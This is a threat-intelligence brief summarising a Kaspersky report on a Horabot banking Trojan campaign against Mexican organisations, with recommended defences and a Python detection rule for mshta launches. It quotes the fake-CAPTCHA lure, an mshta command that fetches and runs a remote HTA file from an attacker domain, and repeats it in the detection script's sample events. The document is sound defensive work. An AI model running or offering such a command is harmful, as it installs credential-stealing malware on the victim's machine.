
Horabot Banking Trojan Campaign Uses Fake CAPTCHA Lures to Target Mexican Organizations

Kaspersky’s MDR team identified a new Horabot campaign in Mexico that starts with a fake CAPTCHA page, leverages mshta to load polymorphic scripts, and culminates in a banking Trojan. The chain targets financial‑service users and highlights the need for stricter execution controls and user awareness.

🛡️ LiveThreat™ Intelligence · 📅 March 18, 2026 · 📰 securelist.com

Severity: High · Type: ThreatIntel · Confidence: High · Affected: 3 sector(s) · Actions: 4 recommended · Source: securelist.com


What Happened — Kaspersky’s MDR team uncovered a new Horabot‑based campaign in Mexico that chains a fake CAPTCHA page, an HTA loader, server‑side polymorphic scripts, AutoIT‑driven malware, and a banking Trojan. The malicious flow is triggered when victims copy‑paste a crafted mshta command into the Windows Run dialog.

Why It Matters for TPRM

  • The attack leverages legitimate Windows utilities (mshta) and polymorphic code, making detection difficult for traditional AV.
  • It targets banking and financial‑related credentials, posing a direct risk to third‑party financial service providers.
  • The multi‑stage chain demonstrates how threat actors can embed ransomware‑grade persistence into routine user interactions, increasing supply‑chain exposure.

Who Is Affected — Financial services firms, payroll processors, and any Mexico‑based organization that permits remote execution of HTA/AutoIT scripts.

Recommended Actions

  • Block mshta.exe execution from non‑trusted locations and enforce application whitelisting.
  • Deploy behavioral detection rules for AutoIT and HTA activity (e.g., Kaspersky’s PDM signatures).
  • Conduct user awareness training on “run‑dialog” social engineering tactics.
  • Review third‑party vendor security posture for similar tool misuse.

Technical Notes

  • Attack vector: Phishing via fake CAPTCHA page that instructs victims to run mshta with a malicious URL.
  • Payload chain: HTA loader → remote JavaScript → server‑side polymorphic script → AutoIT wrapper → banking Trojan (credential stealer).
  • Indicators: mshta https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB.hta, domain evs.grupotuis.buzz, YARA rules published by Kaspersky.
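Detection logic for the mshta stage described in the Technical Notes, of the kind the Recommended Actions call for, added here as an example and not taken from Kaspersky's report or LiveThreat's tooling: it scores Sysmon-style process-creation records (constructed sample events; the field names and the explorer.exe parent relationship are assumptions) and flags mshta.exe loading remote content, rating it higher when the parent is explorer.exe, which is what a command pasted into the Run dialog looks like.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str

# Constructed sample telemetry (not from the Kaspersky report). The first
# command line is the lure quoted in the brief's Technical Notes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB.hta",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\SysWOW64\mshta.exe",
                 r'"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
                 r"C:\Program Files\Vendor\installer.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "MSHTA.EXE hTTp://203.0.113.10/x",     # constructed: mixed case, literal IP
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt",
                 r"C:\Windows\explorer.exe"),
]

REMOTE_ARG = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R runs commands as children of explorer.exe

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: ProcessEvent):
    """Return (severity, reason) for a suspicious mshta launch, else None."""
    if basename(ev.image) != "mshta.exe":
        return None
    match = REMOTE_ARG.search(ev.command_line)
    if not match:
        return None          # local .hta: left to allow-listing policy, not this rule
    reasons = [f"mshta loading remote content: {match.group(0)}"]
    severity = "medium"
    if basename(ev.parent_image) in RUN_DIALOG_PARENTS:
        reasons.append("parent is explorer.exe, consistent with a Run-dialog paste")
        severity = "high"
    return severity, "; ".join(reasons)

def triage(events):
    """[(command_line, severity, reason)] for every event the rule fires on."""
    return [(ev.command_line, *hit) for ev in events if (hit := score_event(ev))]
```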

Source: SecureList – Horabot campaign

📰 Original Source
https://securelist.com/horabot-campaign/119033/

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.
